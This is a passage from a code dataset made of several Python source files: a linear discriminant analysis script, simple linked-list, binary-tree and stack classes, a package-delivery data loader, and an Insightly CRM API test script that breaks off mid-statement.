parser.add_argument(\"inputFile\", help=\"input file in Comma Separated Value format (with or without headers)\")\r\n parser.add_argument(\"outputFile\", help=\"will contain the data projected in the Linear Discriminants' dimensions, output as CSV\")\r\n parser.add_argument(\"labelCol\", help=\"Column number (counting from 0) containing the name of the class to which the sample belongs, should be a positive integer\", type=int)\r\n parser.add_argument(\"-t\", \"--varThreshold\", help=\"cumulative variance threshold after which to drop the useless eigen vectors, default: 0.8\", type=float)\r\n parser.add_argument(\"-ev\", \"--explainedVar\", help=\"output the explained variance along with the cumulative variance, should be a path where to save the image, if '-' the image will be shown but not save\")\r\n parser.add_argument(\"-pd\", \"--projectedData\", help=\"output the data projected in the first two Linear Discriminants' dimensions as a graph of scattered point, the most spread the better, should be a path where to save the image, if '-' the image will be shown but not save\")\r\n parser.add_argument(\"-pm\", \"--projectionMat\", help=\"path where to save the projection matrix used to project the data into PCs' dimensions (as as binary Numpy file .npy)\")\r\n parser.add_argument(\"-dn\", \"--dropNa\", help=\"exclude every row containing an null, invalid or infinite value. Solves the 'Input contains NaN, infinity or a value too large for dtype('float64')' issue\", action=\"store_true\")\r\n parser.add_argument(\"-v\", \"--verbose\", help=\"enable verbose and show graph as they get generated while still saving them\", action=\"store_true\")\r\n args = parser.parse_args()\r\n\r\n ## ------- ARGUMENTS ------- ## \r\n inputFile = args.inputFile\r\n outputFile = args.outputFile\r\n labelColIndex = np.abs(int(args.labelCol))\r\n varThreshold = 0.8 if not args.varThreshold else args.varThreshold\r\n explainedVarPath = args.explainedVar\r\n projectedDataPath = args.projectedData\r\n projectionMatPath = args.projectionMat\r\n dropNa = args.dropNa\r\n verbose = args.verbose\r\n\r\n ## ------- INPUTS ------- ##\r\n data = pd.read_csv(inputFile)\r\n if dropNa: # Drop every lines containing a NaN val, default: disabled\r\n data.dropna(inplace=True)\r\n # Drop empty lines at file-end\r\n data.dropna(how=\"all\", inplace=True)\r\n # Array containing each row's label (as string)\r\n strLabelVect = data.ix[:,labelColIndex].values\r\n # Transform the labels to integer (starting from 1)\r\n enc = LabelEncoder()\r\n labelEncoder = enc.fit(strLabelVect)\r\n labelVect = labelEncoder.transform(strLabelVect) + 1\r\n \r\n # Ex : labelDict = {1: 'class 1', 2: 'class 2', 3: 'class 3' ... etc }\r\n labelDict = dict()\r\n for key, val in zip(labelVect, strLabelVect):\r\n if not key in labelDict:\r\n labelDict[key] = val\r\n if verbose:\r\n print(\"Identified classes: \", labelDict)\r\n\r\n # Only keep rows with numerical data (float or int)\r\n data.drop(data.columns[[labelColIndex]], axis=1, inplace=True) # Remove label's col\r\n numData = data.ix[:,:]._get_numeric_data()\r\n if verbose:\r\n print(\"Numerical data from input:\\n\", numData.head(), \"\\n...\")\r\n # Convert from pandas dataframe to numpy array\r\n numData = numData.values\r\n ## COMPUTE D-DIMENSIONAL MEAN VECTOR ##\r\n # This vector contains the mean vector of each class\r\n # The mean vector is the mean of each feature of this class\r\n meanVects = []\r\n for label in set(labelVect):\r\n meanVects.append(np.mean(numData[labelVect==label], axis=0))\r\n if verbose:\r\n print(\"Mean vect class {}: \\n{}\".format(label, meanVects[label-1]))\r\n\r\n ## COMPUTE SCATTER MATRICES ##\r\n # -- Within-class scatter matrix (called sW)\r\n featureCount = numData.shape[1]\r\n sW = np.zeros((featureCount, featureCount))\r\n for label, meanVect in zip(set(labelVect), meanVects):\r\n classScatterMat = np.zeros_like(sW) # scatter matrix for class\r\n for row in numData[labelVect == label]:\r\n row = row.reshape(row.shape[0], 1)\r\n meanVect = meanVect.reshape(meanVect.shape[0], 1) # make col vect\r\n classScatterMat += (row-meanVect).dot((row-meanVect).T)\r\n sW += classScatterMat\r\n if verbose:\r\n print(\"Within-class scatter matrix: \\n\", sW)\r\n\r\n # -- Between-class scatter matrix (called sB)\r\n totalMean = np.mean(numData, axis=0)\r\n sB = np.zeros((featureCount, featureCount))\r\n for i, meanVect in enumerate(meanVects):\r\n n = numData[labelVect == i+1, :].shape[0]\r\n meanVect = np.array(meanVect) # avoid strange warning\r\n meanVect = meanVect.reshape(meanVect.shape[0], 1) # make col vect\r\n totalMean = np.array(totalMean) # avoid strange warning\r\n totalMean = totalMean.reshape(totalMean.shape[0], 1) # make col vect\r\n sB += n * (meanVect - totalMean).dot((meanVect - totalMean).T)\r\n\r\n if verbose:\r\n print(\"Between-class scatter matrix: \\n\", sB)\r\n\r\n ## CORE OF LDA ##\r\n eigVals, eigVects = np.linalg.eig(np.linalg.inv(sW).dot(sB))\r\n if verbose:\r\n for i in range(len(eigVals)):\r\n eigVect = eigVects[:,i].reshape(eigVects.shape[0], 1) # make col vect\r\n if eigVect.shape[0] < 7:\r\n print(\"Eigen vect {}: \\n{}\".format(i+1, eigVect.real))\r\n print(\"Eigen val {}: \\n{:.2e}\".format(i+1, eigVals[i].real))\r\n if i > 7:\r\n break\r\n # Checking if eigen vectors/values are alright\r\n print(\"Eigen Vects should be valid solution of sW^(-1)*sB*EigVect = EigVal*EigVect, checking...\", end=\"\\t\")\r\n for i in range(len(eigVals)):\r\n eigVect = eigVects[:,i].reshape(eigVects.shape[0], 1) # make col vect\r\n np.testing.assert_array_almost_equal(np.linalg.inv(sW).dot(sB).dot(eigVect).real,\r\n (eigVals[i] * eigVect).real,\r\n decimal=6,\r\n err_msg=\"Strange, the eigen vectors/values are wrong ?! This often occurs when the values are more than e+10, since numpy checks for differences in decimals regardless of the scale\",\r\n verbose=True)\r\n print(\"... Success !\")\r\n\r\n ## ------- SORT EIGEN VECTS BY EIGEN VALS ------- ##\r\n # \"The eigenvectors with the lowest eigenvalues bear the least information about the distribution of the data\"\r\n # Let's drop 'em\r\n\r\n # List of (eigVal, eigVect) tuples\r\n eigPairs = [(np.abs(eigVals[i]), eigVects[:,i]) for i in range(len(eigVals))]\r\n # Sort it\r\n eigPairs.sort(key=lambda x: x[0], reverse=True)\r\n if verbose and len(eigPairs) < 8:\r\n print(\"List of eigen vals in descending order:\", [i[0] for i in eigPairs])\r\n\r\n ## ------- EXPLAINED VARIANCE ------- ##\r\n eigSum = sum(eigVals)\r\n explnVar = [(i/eigSum)*100 for i in sorted(eigVals, reverse=True)]\r\n cumulativeExplnVar = np.cumsum(explnVar)\r\n if verbose:\r\n for i,j in enumerate(eigPairs):\r\n print(\"Eigen value {0:}: {1:.2%}\".format(i+1, (j[0]/eigSum).real))\r\n if i > 7:\r\n break\r\n ## ------- GRAPH EXPLAINED VAR ------- ##\r\n # Graph of the explained variance compared to the cumulative\r\n if not explainedVarPath is None:\r\n with plt.style.context(\"seaborn-whitegrid\"):\r\n plt.figure(figsize=(9, len(eigVals)))\r\n plt.bar(range(len(eigVals)), explnVar, alpha=0.5, align=\"center\", label=\"individual explained variance\")\r\n plt.step(range(len(eigVals)), cumulativeExplnVar, where=\"mid\", label=\"cumulative explained variance\")\r\n plt.ylabel(\"Explained variance ratio\")\r\n plt.xlabel(\"Eigen vects\")\r\n plt.legend(loc=\"best\")\r\n plt.tight_layout()\r\n if verbose or explainedVarPath == \"-\":\r\n plt.show()\r\n if explainedVarPath != \"-\":\r\n print(\"Explained Variance saved under : {}\".format(explainedVarPath))\r\n plt.savefig(explainedVarPath)\r\n\r\n ## ------- PROJECTION MATRIX ------- ##\r\n amountOfEigVectsToKeep = 0\r\n sortedEigVals = sorted(eigVals, reverse=True)\r\n while sum([sortedEigVals[i]/eigSum for i in range(amountOfEigVectsToKeep)]) < varThreshold:\r\n amountOfEigVectsToKeep += 1\r\n if verbose:\r\n varConserved = sum([sortedEigVals[i]/eigSum for i in range(amountOfEigVectsToKeep)]).real\r\n print(\"Amount of eigen vectors to keep to keep >={0:.2%} of information is {1:}, keeping {2:.2%} variance\".format(varThreshold, amountOfEigVectsToKeep, varConserved))\r\n \r\n # Create the projection matrix using the minimum amount of eigen vects to keep to reach the threshold\r\n eigVectsForLDA = []\r\n for i in range(amountOfEigVectsToKeep):\r\n eigVectLen = len(eigPairs[i][1])\r\n # Tilt the eig vects on their side to get vectors and not lists\r\n eigVectsForLDA.append(eigPairs[i][1].reshape(eigVectLen, 1))\r\n # Combine each eig vects horizontally to get a numberOfInputFeatures x amountOfEigVectsToKeep projection matrix\r\n # in which the data dimension is optimally reduced\r\n matW = np.hstack(tuple(eigVectsForLDA)).real\r\n if verbose:\r\n print(\"Projection Matrix (matrix W):\\n\", matW)\r\n \r\n ## ------- SAVE PROJECTION MATRIX ------- ##\r\n if not projectionMatPath is None:\r\n print(\"Projection Matrix (matrix W) saved under: {} in Numpy binary format (.npy)\".format(projectionMatPath))\r\n np.save(projectionMatPath, matW)\r\n\r\n ## PROJECT DATA ONTO NEW SUBSPACE ##\r\n Y = numData.dot(matW).real\r\n print(\"Input dimensions: {0:}\\nOutput dimensions: {1:}\\nReduction: {2:.2%}\".format(numData.shape[1], Y.shape[1], 1-Y.shape[1]/numData.shape[1]))\r\n assert Y.shape == (numData.shape[0], amountOfEigVectsToKeep), \"The matrix is not {}x{} dimensional !!\".format(numData.shape[0], amountOfEigVectsToKeep)\r\n ## ------- GRAPH PROJECTION DATA ------- ##\r\n # Show a representation in 2D\r\n if not projectedDataPath is None and Y.shape[1] >= 2:\r\n with plt.style.context(\"seaborn-whitegrid\"):\r\n plt.figure(figsize=(40, 20))\r\n ax = plt.subplot(111)\r\n # Generate unique label colour\r\n dicoLabelColor = dict()\r\n listColors = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\r\n for i in range(max(labelVect)):\r\n dicoLabelColor[i+1] = listColors[(i+1)%len(listColors)]\r\n\r\n Y_round = np.around(Y, decimals=2)\r\n for lab in set(labelVect):\r\n # Col 0 is first PC, col 1 is second PC\r\n x = Y_round[lab==labelVect, 0]\r\n y = Y_round[lab==labelVect, 1]\r\n plt.scatter(x, y, alpha=0.5, label=labelDict[lab], c=dicoLabelColor[lab], marker=\".\", s=500)\r\n plt.xlabel(\"LD 1\")\r\n plt.ylabel(\"LD 2\")\r\n legend = plt.legend(loc=\"upper right\", fancybox=True)\r\n legend.get_frame().set_alpha(0.5)\r\n plt.title(\"LDA: {} projection onto the first 2 linear discriminant\".format(inputFile))\r\n # hide axis ticks\r\n plt.tick_params(axis='both', which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\", labelleft=\"on\")\r\n # remove axis spines\r\n ax.spines[\"top\"].set_visible(False) \r\n ax.spines[\"right\"].set_visible(False)\r\n ax.spines[\"bottom\"].set_visible(False)\r\n ax.spines[\"left\"].set_visible(False) \r\n plt.grid()\r\n plt.tight_layout()\r\n if verbose or projectedDataPath == \"-\":\r\n plt.show()\r\n if projectedDataPath != \"-\":\r\n print(\"Projection in 2D using the new LD axis saved under : {}\".format(projectedDataPath))\r\n plt.savefig(projectedDataPath)\r\n\r\n columns = [\"LD{}\".format(i+1) for i in range(Y.shape[1])]\r\n columns.append(\"class\")\r\n labelCol = np.array([labelDict[label] for label in labelVect]).reshape(labelVect.shape[0], 1)\r\n Y = np.append(Y, labelCol, axis=1)\r\n Y = pd.DataFrame(Y, columns=columns)\r\n Y.to_csv(outputFile, sep=\",\", encoding=\"utf-8\", index=False)\r\n print(\"Projected data saved under: {}\".format(outputFile))\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])","sub_path":"scripts/automatic_lda.py","file_name":"automatic_lda.py","file_ext":"py","file_size_in_byte":13224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447668642","text":"\"\"\" Sort Demonstrator/Structures\r\n Author: Victoria Jurkfitz Kessler Thibes\r\n Date: Dec. 02, 2016\r\n Course: CST8333 - Programming Language Research Project\r\n\"\"\"\r\n\r\nfrom copy import deepcopy\r\n\r\nclass LinkedList:\r\n \"\"\" Implements a linked list with one node and a link to another \"\"\"\r\n\r\n node_data = ''\r\n # Data for this node\r\n\r\n next_node = ''\r\n # Next node in the list\r\n\r\n def __init__(self, data):\r\n \"\"\" Constructor \"\"\"\r\n if len(data) > 0:\r\n data_copy = deepcopy(data)\r\n\r\n # Takes first item from array\r\n self.node_data = data_copy.pop(0)\r\n\r\n # Next node is constructed until original array is empty\r\n if len(data_copy) > 0:\r\n self.next_node = LinkedList(data_copy)\r\n\r\n def get_string(self):\r\n \"\"\"\" Used to print results \"\"\"\r\n\r\n if self.next_node != '':\r\n return str(self.node_data) + \" | Next node: \" + str(self.next_node.node_data) + \"\\n\" + self.next_node.get_string()\r\n\r\n else:\r\n return str(self.node_data) + \" | Next node: empty\"\r\n\r\n def insert(self,data):\r\n\r\n if self.next_node == '':\r\n self.next_node = LinkedList(data)\r\n\r\n else:\r\n self.next_node.insert(data)\r\n\r\n\r\nclass BinaryTree:\r\n \"\"\" Implements a binary tree \"\"\"\r\n\r\n parent = ''\r\n # Parent node\r\n\r\n node_data = ''\r\n # Current node's data\r\n\r\n left = ''\r\n # Children to the left\r\n\r\n right = ''\r\n # Children to the right\r\n\r\n def __init__(self,data,parent):\r\n \"\"\" Constructor \"\"\"\r\n\r\n self.parent = parent\r\n\r\n if len(data) > 0:\r\n # Takes the middle item from the array\r\n mid = data.pop(int(len(data)/2))\r\n self.node_data = mid\r\n\r\n if len(data) > 0:\r\n # Next half of the array is linked to the right\r\n self.right = BinaryTree(data[int(len(data)/2):],self)\r\n if self.right.node_data == '':\r\n self.right = ''\r\n\r\n if len(data) > 0:\r\n # Previous half of the array is linked to the left\r\n self.left = BinaryTree(data[:int(len(data)/2)],self)\r\n if self.left.node_data == '':\r\n self.left = ''\r\n\r\n def get_string(self):\r\n \"\"\" Called to show results \"\"\"\r\n\r\n if self.right != '' and self.right.node_data == '':\r\n self.right = ''\r\n\r\n if self.left != '' and self.left.node_data == '':\r\n self.left = ''\r\n\r\n return_string = str(self.node_data) + \"\\tParent: \"\r\n\r\n if self.parent != '':\r\n return_string += str(self.parent.node_data)\r\n\r\n else:\r\n return_string += \" None\"\r\n\r\n return_string += \"\\tChildren: \"\r\n\r\n if self.right != '' and self.left != '':\r\n children_string = str(self.left.node_data) + \",\" + str(self.right.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.left.get_string() + \"\\n\" + self.right.get_string()\r\n\r\n elif self.right != '':\r\n children_string = str(self.right.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.right.get_string()\r\n\r\n elif self.left != '':\r\n children_string = str(self.left.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.left.get_string()\r\n\r\n else:\r\n return return_string + \"None\"\r\n\r\n\r\nclass Stack:\r\n \"\"\"\" Implements a stack \"\"\"\r\n\r\n node_data = ''\r\n # Current node's data\r\n\r\n next_node = ''\r\n # Next item on the stack\r\n\r\n def __init__(self,data):\r\n \"\"\" Constructor \"\"\"\r\n if len(data) > 0:\r\n self.node_data = data.pop()\r\n\r\n if len(data) > 0:\r\n self.next_node = Stack(data)\r\n\r\n def pop(self):\r\n \"\"\"\" Takes the first node out of the stack \"\"\"\r\n popped = self.node_data\r\n\r\n if self.next_node != '':\r\n self.node_data = self.next_node.node_data\r\n self.next_node = self.next_node.next_node\r\n\r\n else:\r\n self.node_data = ''\r\n\r\n return popped\r\n\r\n def push(self,data):\r\n \"\"\"\" Puts a new node on top of the stack \"\"\"\r\n if self.next_node != '':\r\n self.next_node.push(self.node_data)\r\n self.node_data = data\r\n\r\n else:\r\n self.next_node = Stack([self.node_data])\r\n self.node_data = data\r\n\r\n def get_string(self):\r\n \"\"\"\" Called to print results \"\"\"\r\n if self.next_node != '' and self.next_node.node_data == '':\r\n self.next_node = ''\r\n\r\n if self.next_node != '':\r\n return \"\\t\" + str(self.node_data) + \"\\n\" + self.next_node.get_string()\r\n\r\n else:\r\n # Last node is at the bottom\r\n return \"Bottom: \" + str(self.node_data)\r\n\r\n","sub_path":"Python_Sorter/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458546517","text":"# Dawei Li, 001022014\n\nimport re\nfrom .hash_table import MyHashTable\nfrom datetime import datetime\nfrom .read_xlsx import XlsxReader\n\n\n# Create two global variables to hold package and distance data\n# to be used across modules.\npackage_data = None\ndistance_data = None\ntotal_distance = 0\n\n\ndef init():\n read_package_data()\n read_distance_data()\n\n\ndef read_package_data():\n \"\"\"Read package data into a hash table\"\"\"\n # Create an empty hash table to store package data\n # Key: package ID\n # Value: a hash table holding package details\n global package_data\n package_reader = XlsxReader(file_loc=\"./data/WGUPS Package File.xlsx\")\n rawdata = package_reader.read_data_sheet(0)\n package_data = MyHashTable()\n for row in range(8, rawdata.nrows):\n # Package id is the key\n id = rawdata.cell_value(row, 0)\n # Use a hash table to store package details\n hash_table = MyHashTable()\n # Package 9 has a wrong address.\n if row == 16:\n hash_table.add(\"address\", \"410 S State St\")\n else:\n hash_table.add(\"address\", rawdata.cell_value(row, 1))\n hash_table.add(\"city\", rawdata.cell_value(row, 2))\n hash_table.add(\"state\", rawdata.cell_value(row, 3))\n hash_table.add(\"zip\", rawdata.cell_value(row, 4))\n hash_table.add(\"deadline\", deadline(rawdata.cell_value(row, 5)))\n hash_table.add(\"weight\", rawdata.cell_value(row, 6))\n hash_table.add(\"notes\", rawdata.cell_value(row, 7))\n # Add and initialize two additional attributes\n hash_table.add(\"status\", \"idle\")\n hash_table.add(\"delivery time\", None)\n # Add package id (key) and details (value) to the hash table\n package_data.add(id, hash_table)\n\n\ndef deadline(time):\n \"\"\"Convert the deadline data in the EOD column in the package excel file to datetime format\"\"\"\n # If time is \"EOD\", convert it to 17:00\n if time == \"EOD\":\n return datetime(2019, 11, 22, 17)\n time = int(time * 24 * 3600)\n hour = time // 3600\n minute = (time % 3600) // 60\n return datetime(2019, 11, 22, hour, minute)\n\n\ndef read_distance_data():\n \"\"\"Read distance data into a hash table\"\"\"\n # Create an empty hash table to store distance data\n # Key: a tuple of two locations\n # Value: distance between the two locations in the key\n global distance_data\n distance_reader = XlsxReader(file_loc=\"./data/WGUPS Distance Table.xlsx\")\n rawdata = distance_reader.read_data_sheet(0)\n distance_data = MyHashTable()\n # First extract only street number and street name\n # from the full address. This combination matches the \n # address data in the packages data\n addresses = []\n col = 0\n for row in range(8, rawdata.nrows):\n value = rawdata.cell_value(row, col)\n value = re.split(r'\\s*\\n\\s*', value)[1]\n value = re.split(r'\\,', value)[0]\n # Correct a mismatch between the distance file and the package file\n if value == \"3575 W Valley Central Sta bus Loop\":\n value = \"3575 W Valley Central Station bus Loop\"\n addresses.append(value)\n # Extract distance data into the hash table\n for row in range(8, rawdata.nrows):\n for i in range(2, row-7):\n address_tuple = (addresses[row-8], addresses[i-2])\n distance = rawdata.cell_value(row, i)\n distance_data.add(address_tuple, distance)\n for j in range(row+1, rawdata.nrows):\n address_tuple = (addresses[j-8], addresses[row-8])\n distance = rawdata.cell_value(j, row-6)\n distance_data.add(address_tuple, distance)\n # Two packages may be delivered to the same address.\n # So set the distance of a location to itself as 0.\n address_tuple = (addresses[row-8], addresses[row-8])\n distance_data.add(address_tuple, 0)\n\n\ndef all_status():\n \"\"\"Return a hash table of (id, status) for all packages.\"\"\"\n global package_data\n all_status = MyHashTable()\n packages_id = package_data.all_keys()\n for id in packages_id:\n status = package_data.get(id).get(\"status\")\n delivery_time = package_data.get(id).get(\"delivery time\")\n all_status.add(id, (status, delivery_time))\n print(id, \" \", (status, delivery_time))\n return all_status\n","sub_path":"packages/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336803181","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n# Insightly API Test Script\n# Brian McConnell <brian@insightly.com>\n#\n# This Python module implements a test suite against the API. This allows users to create\n# whatever test cases they want in addition to the standard set of tests we run against\n# API endpoints.\n#\n# USAGE:\n#\n# i = Insightly()\n# i.test()\n#\n# NOTE:\n#\n# If you run the test suite, we recommend running it against a test instance with dummy data,\n# as there is the potential for data loss. The test suite is primarily intended for use in\n# QA testing. \n\nfrom insightly import Insightly\n\nget_endpoints = ['activitysets', 'contacts', 'countries', 'currencies', 'customfieldgroups', 'customfields', 'emails', 'filecategories','follows',\n 'instance','leads','leadsources','leadstatuses','notes','opportunities','opportunitycategories','opportunitystatereasons',\n 'organisations','pipelines','pipelinestages','projectcategories','projects','relationships','taskcategories','tasks','teammembers','teams','users']\n\ndef test(apikey='', version='2.2', dev=None):\n i = Insightly(apikey=apikey, version=version, dev=dev, test=True)\n i.tests_run = 0\n i.tests_passed = 0\n # test activity sets\n activity_sets = i.read('activitysets')\n if activity_sets is not None:\n activity_set_id = activity_sets[0]['ACTIVITYSET_ID']\n activity_set = i.read('activitysets', id=activity_set_id)\n # test contacts\n contacts = i.read('contacts')\n if contacts is not None:\n contact_id = contacts[0]['CONTACT_ID']\n contact = i.read('contacts', id=contact_id)\n contact = {'FIRST_NAME':'Test','LAST_NAME':'ミスターマコーネル'}\n contact = i.create('contacts', contact)\n if contact is not None:\n contact['FIRST_NAME'] = 'Foo'\n contact = i.update('contacts', contact)\n contact_id = contact['CONTACT_ID']\n i.upload_image('contacts', contact_id, 'apollo17.jpg')\n address = i.create_child('contacts', contact_id, 'addresses', {'ADDRESS_TYPE':'HOME','CITY':'San Francisco', 'STATE':'CA', 'COUNTRY':'United States'})\n if address is not None:\n address_id = address['ADDRESS_ID']\n i.delete('contacts',contact_id,sub_type='addresses',sub_type_id=address_id)\n contactinfo = i.create_child('contacts', contact_id, 'contactinfos', {'TYPE':'EMAIL','SUBTYPE':'Home','DETAIL':'foo@bar.com'})\n if contactinfo is not None:\n contact_info_id = contactinfo['CONTACT_INFO_ID']\n i.delete('contacts', contact_id, sub_type='contactinfos', sub_type_id = contact_info_id)\n contact_date = {'OCCASION_NAME':'Birthday','OCCASION_DATE':'2016-05-02T12:00:00Z'}\n contact_date = i.create_child('contacts', contact_id, 'dates', contact_date)\n if contact_date is not None:\n date_id = contact_date['DATE_ID']\n i.delete('contacts', contact_id, sub_type='dates', sub_type_id=date_id)\n tag = {'TAG_NAME':'foo'}\n i.create_child('contacts', contact_id, 'tags', tag)\n i.delete('contacts', contact_id,sub_type='tags', sub_type_id = 'foo')\n note = {'TITLE':'Test', 'BODY':'This is the body'}\n note = i.create_child('contacts', contact_id, 'notes', note)\n events = i.read('contacts', contact_id, sub_type='events')\n file_attachments = i.read('contacts', contact_id, sub_type='fileattachments')\n i.upload('contacts', contact_id, 'apollo17.jpg')\n i.create_child('contacts', contact_id, 'follow', {})\n i.delete('contacts', contact_id, sub_type='follow')\n tasks = i.read('contacts', contact_id, sub_type='tasks')\n emails = i.read('contacts', contact_id, sub_type='emails')\n i.delete('contacts', contact_id)\n countries = i.read('countries')\n currencies = i.read('currencies')\n custom_field_groups = i.read('customfieldgroups')\n custom_fields = i.read('customfields')\n if custom_fields is not None:\n custom_field_id = custom_fields[0]['CUSTOM_FIELD_ID']\n custom_field = i.read('customfields', custom_field_id)\n emails = i.read('emails')\n if emails is not None:\n email_id = emails[0]['EMAIL_ID']\n email = i.read('emails', email_id)\n i.create_child('emails', email_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('emails', email_id, sub_type='tags', sub_type_id = 'foo')\n comments = i.read('emails', email_id, sub_type='/comments')\n events = i.read('events')\n file_categories = i.read('filecategories')\n if file_categories is not None:\n file_category_id = file_categories[0]['CATEGORY_ID']\n file_category = i.read('filecategories', file_category_id)\n follows = i.read('follows') \n instance = i.read('instance')\n leads = i.read('leads')\n if leads is not None:\n lead_id = leads[0]['LEAD_ID']\n lead = i.read('leads', lead_id)\n lead = i.create('leads', {'FIRST_NAME':'foo', 'LAST_NAME':'bar'})\n if lead is not None:\n lead_id = lead['LEAD_ID']\n lead['FIRST_NAME']='foozle'\n lead = i.update('leads', lead)\n i.upload_image('leads', lead_id, 'apollo17.jpg')\n i.delete('leads', lead_id, sub_type='image')\n i.create_child('leads', lead_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('leads', lead_id, sub_type='tags', sub_type_id='foo')\n i.create_child('leads', lead_id, 'follow', {})\n i.delete('leads', lead_id, sub_type='follow')\n notes = i.read('leads', lead_id, sub_type='notes')\n i.create_child('leads', lead_id, 'notes', {'TITLE':'foo','BODY':'This is the body'})\n events = i.read('leads', lead_id, sub_type='events')\n file_attachments = i.read('leads', lead_id, sub_type='fileattachments')\n i.upload('leads', lead_id, 'apollo17.jpg')\n tasks = i.read('leads', lead_id, sub_type='tasks')\n emails = i.read('leads', lead_id, sub_type='emails')\n i.delete('leads', lead_id)\n leadsources = i.read('leadsources')\n lead_source = i.create('leadsources', {'LEAD_SOURCE':'Foozle Barzle'})\n if lead_source is not None:\n lead_source['LEAD_SOURCE'] = 'Barzle Foozle'\n lead_source_id = lead_source['LEAD_SOURCE_ID']\n lead_source = i.update('leadsources', lead_source)\n i.delete('leadsources', lead_source_id)\n lead_statuses = i.read('leadstatuses')\n lead_status = i.create('leadstatuses', {'LEAD_STATUS':'Foozle'})\n if lead_status is not None:\n lead_status_id = lead_status['LEAD_STATUS_ID']\n lead_status['LEAD_STATUS']='Barzle'\n lead_status['STATUS_TYPE']=1\n lead_status = i.update('leadstatuses', lead_status)\n i.delete('leadstatuses', lead_status_id)\n notes = i.read('notes')\n if notes is not None:\n note_id = notes[0]['NOTE_ID']\n note = i.read('notes', note_id)\n file_attachments = i.read('notes', note_id, sub_type='fileattachments')\n i.create_child('notes', note_id, 'follow', {})\n i.delete('notes', note_id, sub_type='follow')\n comments = i.read('notes', note_id, sub_type='comments')\n opportunities = i.read('opportunities')\n if opportunities is not None:\n opportunity_id = opportunities[0]['OPPORTUNITY_ID']\n opportunity = i.read('opportunities', opportunity_id)\n opportunity = i.create('opportunities', {'OPPORTUNITY_NAME':'Foozle','OPPORTUNITY_STATE':'Open'})\n if opportunity is not None:\n opportunity['OPPORTUNITY_NAME'] = 'Barzle'\n opportunity_id = opportunity['OPPORTUNITY_ID']\n opportunity = i.update('opportunities', opportunity)\n i.upload_image('opportunities', opportunity_id, 'apollo17.jpg')\n i.delete('opportunities', opportunity_id, 'image')\n i.create_child('opportunities', opportunity_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('opportunities', opportunity_id, sub_type='tags', sub_type_id='foo')\n notes = i.read('opportunities', opportunity_id, sub_type='notes')\n i.create_child('opportunities', opportunity_id, 'notes', {'TITLE':'foo','BODY':'This is a test'})\n events = i.read('opportunities', opportunity_id, sub_type='events')\n file_attachments = i.read('opportunities', opportunity_id, sub_type='fileattachments')\n i.upload('opportunities', opportunity_id, 'apollo17.jpg')\n i.create_child('opportunities', opportunity_id, 'follow', {})\n i.delete('opportunities', opportunity_id, sub_type='follow')\n # add call to update opportunity state/state reason here\n opportunity_state_reasons = i.read('opportunities', opportunity_id, sub_type='statehistory')\n tasks = i.read('opportunities', opportunity_id, sub_type='tasks')\n emails = i.read('opportunities', opportunity_id, sub_type='emails')\n email = i.read('opportunities', opportunity_id, sub_type='linkemailaddress')\n i.delete('opportunities', opportunity_id, sub_type='pipeline')\n i.delete('opportunities', opportunity_id)\n opportunity_categories = i.read('opportunitycategories')\n opportunity_state_reasons = i.read('opportunitystatereasons')\n \n organisations = i.read('organisations')\n if organisations is not None:\n organisation_id = organisations[0]['ORGANISATION_ID']\n organisation = i.read('organisations', organisation_id)\n organisation = i.create('organisations', {'ORGANISATION_NAME':'Foo Corporation'})\n if organisation is not None:\n organisation_id = organisation['ORGANISATION_ID']\n organisation['ORGANISATION_NAME']='Bar Corporation'\n organisation = i.update('organisations', organisation)\n address = i.create_child('organisations', organisation_id, 'addresses', {'CITY':'San Francisco', 'STATE':'CA', 'COUNTRY':'United States', 'ADDRESS_TYPE':'Work'})\n if address is not None:\n address_id = address['ADDRESS_ID']\n i.delete('organisations', organisation_id, sub_type='addresses', sub_type_id=address_id)\n contactinfo = i.create_child('organisations', organisation_id, 'contactinfos', {'TYPE':'EMAIL','SUBTYPE':'Home','DETAIL':'foo@bar.com'})\n if contactinfo is not None:\n contact_info_id = contactinfo['CONTACT_INFO_ID']\n i.delete('organisations', organisation_id, sub_type='contactinfos', sub_type_id=contact_info_id)\n odate = i.create_child('organisations', organisation_id, 'dates', {'OCCASION_NAME':'Birthday','OCCASION_DATE':'2016-05-02T12:00:00Z'})\n if odate is not None:\n date_id = odate['DATE_ID']\n i.delete('organisations', organisation_id, sub_type='dates', sub_type_id=date_id)\n i.create_child('organisations', organisation_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('organisations',organisation_id, sub_type='tags', sub_type_id='foo')\n i.upload_image('organisations', organisation_id, 'apollo17.jpg')\n i.delete('organisations', organisation_id, sub_type='image')\n notes = i.read('organisations', organisation_id, sub_type='notes')\n i.create_child('organisations', organisation_id, 'notes', {'TITLE':'Title','BODY':'This is the body'})\n events = i.read('organisations', organisation_id, sub_type='events')\n file_attachments = i.read('organisations', organisation_id, sub_type='fileattachments')\n i.upload('organisations', organisation_id, 'apollo17.jpg')\n i.create_child('organisations', organisation_id, 'follow', {})\n i.delete('organisations', organisation_id, sub_type='follow')\n emails = i.read('organisations', organisation_id, sub_type='emails')\n tasks = i.read('organisations', organisation_id, sub_type='tasks')\n i.delete('organisations', organisation_id)\n \n pipelines = i.read('pipelines')\n if pipelines is not None:\n pipeline_id = pipelines[0]['PIPELINE_ID']\n pipeline = i.read('pipelines', pipeline_id)\n \n pipeline_stages = i.read('pipelinestages')\n if pipeline_stages is not None:\n stage_id = pipeline_stages[0]['STAGE_ID']\n pipeline_stage = i.read('pipelinestages', stage_id)\n \n projects = i.read('projects')\n if projects is not None:\n project_id = projects[0]['PROJECT_ID']\n project = i.read('projects', project_id)\n project = 